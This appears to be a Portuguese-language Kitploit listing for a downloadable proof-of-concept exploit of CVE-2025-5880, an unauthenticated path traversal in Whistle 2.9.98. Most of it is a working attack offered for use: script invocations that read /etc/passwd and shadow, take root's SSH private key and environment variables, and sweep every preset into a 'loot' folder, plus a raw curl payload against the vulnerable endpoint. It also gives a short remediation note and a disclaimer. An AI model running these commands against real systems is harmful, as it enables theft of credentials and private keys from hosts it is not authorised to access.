Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-5880-PoC — Exploit de prova de conceito para uma vulnerabilidade de travessia de caminho não autenticada no Whistle v2.9.98. | Kitploit
Ferramentas/GitHubGitHub/yacine-rm/cve-2025-5880-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubyacine-rm/cve-2025-5880-poc

CVE-2025-5880-PoC

Exploit de prova de conceito para uma vulnerabilidade de travessia de caminho não autenticada no Whistle v2.9.98.

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-5880 — Prova de Conceito de Path Traversal no Whistle 2.9.98

Python CVE CWE License

Prova de conceito de exploração para uma vulnerabilidade de path traversal não autenticada no Whistle v2.9.98.


Resumo da Vulnerabilidade

CampoDetalhe
ID CVECVE-2025-5880
CWECWE-22 (Path Traversal)
Software AfetadoWhistle ≤ 2.9.98
Endpoint Afetado/cgi-bin/sessions/get-temp-file
Vetor de AtaqueRede — nenhuma autenticação necessária
ImpactoLeitura arbitrária de arquivos no sistema de arquivos do host

O parâmetro de consulta filename não é sanitizado antes de ser usado para abrir um arquivo no disco, permitindo que um atacante escape do diretório de arquivos temporários pretendido e leia qualquer arquivo que o processo Whistle tenha permissão para acessar (por exemplo, /etc/passwd, /root/.ssh/id_rsa).


Início Rápido

root@kitploit:~
# Clone
git clone https://github.com/YourHandle/CVE-2025-5880
cd CVE-2025-5880
 
# Sem dependências externas
python3 CVE-2025-5880.py -u http://TARGET:8899 --preset passwd

Uso

root@kitploit:~
python3 CVE-2025-5880.py [-h] -u URL [-f FILE] [--preset PRESET]
                          [--sweep] [-o OUTPUT] [--save-dir DIR]
                          [--timeout N]

Exemplos

root@kitploit:~
# Ler /etc/passwd
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset passwd
 
# Obter a chave privada SSH do root
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset id_rsa -o id_rsa.pem
 
# Ler um caminho arbitrário
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 -f /proc/self/environ
 
# Varrer e salvar todos os presets
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --sweep --save-dir ./loot

PoC Bruto (curl)

root@kitploit:~
# /etc/passwd
curl -s "http://TARGET:8899/cgi-bin/sessions/get-temp-file?filename=/etc/passwd" | jq -r '.value'

Remediação

Atualize o Whistle para uma versão que valide e restrinja o parâmetro filename ao diretório de arquivos temporários pretendido. Aplique normalização de caminho com lista de permissões (ex.: path.resolve + verificação de prefixo) no lado do servidor.


Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais.
O uso não autorizado contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal e antiético.
O autor não assume nenhuma responsabilidade pelo uso indevido.

Baixar ferramenta
OpçãoDescrição
-u / --urlURL base do alvo (ex.: http://192.168.1.10:8899)
-f / --fileCaminho de arquivo arbitrário para ler
--presetAtalho nomeado: passwd shadow hosts id_rsa …
--sweepPercorrer todos os presets automaticamente
-o / --outputSalvar resultado em um arquivo
--save-dirDiretório para despejar os achados do --sweep
--timeoutTimeout HTTP em segundos (padrão 10)